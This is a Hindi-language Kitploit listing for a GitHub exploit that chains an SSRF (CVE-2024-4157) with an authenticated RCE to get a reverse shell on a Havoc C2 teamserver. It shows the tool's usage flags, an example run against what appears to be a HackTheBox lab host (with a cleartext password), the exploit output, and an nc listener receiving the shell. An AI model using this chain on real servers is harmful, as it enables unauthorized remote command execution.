Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-4157-SSRF-RCE-Reverse-Shell — Havoc C2 SSRF को RCE के साथ जोड़कर Havoc C2 सर्वर पर रिवर्स शेल प्राप्त करना। | Kitploit
उपकरण/GitHubGitHub/ch4os1/cve-2024-4157-ssrf-rce-reverse-shell
शोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंगपेलोड डेवलपमेंट
GitHubch4os1/cve-2024-4157-ssrf-rce-reverse-shell

CVE-2024-4157-SSRF-RCE-Reverse-Shell

Havoc C2 SSRF को RCE के साथ जोड़कर Havoc C2 सर्वर पर रिवर्स शेल प्राप्त करना।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
11 महीने पहलेअभी तक समीक्षित नहीं

CVE-2024-4157: Havoc C2 पर रिवर्स शेल प्राप्त करना - SSRF को RCE के साथ जोड़ना

स्थानीय IP और पोर्ट के साथ रिवर्स-शेल प्राप्त करें, CVE-2024-4157 POC को havoc_auth_rce के साथ जोड़ते हुए

उपयोग

  • बुनियादी जानकारी
root@kitploit:~
$ python3 exploit.py
usage: exploit.py [-h] [-t TARGET] [-i IP] [-p PORT] [-A USER_AGENT] [-H HOSTNAME] [-u USERNAME] [-d DOMAIN_NAME] [-n PROCESS_NAME] [-ip INTERNAL_IP] [-U ADMIN_USERNAME] [-P
                  PASSWORD] [-l LOCAL_IP] [-lp LOCAL_PORT]
## -t: target IP where the C2 server is running on
## -i: internal IP address that we want the C2 server to interactive with (SSRF)
## -p: internal port 
## -U: username to the C2 server
## -P: password to the C2 server
## -l: local address for the reverse shell (RCE)
## -lp: local port for the reverse shell
  • उदाहरण
root@kitploit:~
$ python3 exploit.py -t https://10.129.150.254 -i 127.0.0.1 -p 40056 -U ilya -P 'CobaltStr1keSuckz!' -l 10.10.14.54 -lp 4444
[***] Trying to register agent...
[***] Success!
[***] Trying to open socket on the teamserver...
[***] Success!
[***] Trying to write to the socket
[***] Success!
[***] Trying to write to the socket
[***] Success!
[***] Trying to write to the socket
[***] Success!
[***] Trying to write to the socket
[***] Success!
[***] Trying to poll teamserver for socket output...
[***] Read socket output successfully!
  • हमारे nc लिसनर पर रिवर्स शेल
root@kitploit:~
$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.54] from (UNKNOWN) [10.129.150.254] 53352
bash: cannot set terminal process group (2933): Inappropriate ioctl for device
bash: no job control in this shell
ilya@backfire:~/Havoc/payloads/Demon$ 

श्रेय

  • @chebuya को श्रेय SSRF के लिए, भेद्यता पर विस्तृत ब्लॉग
  • @Laurence Tennant को श्रेय RCE के लिए, ब्लॉग पर विस्तृत जानकारी
  • 0xdf को श्रेय HTB Backfire पर शानदार राइटअप के लिए

अस्वीकरण

  • यह उपकरण केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए है
टूल डाउनलोड करें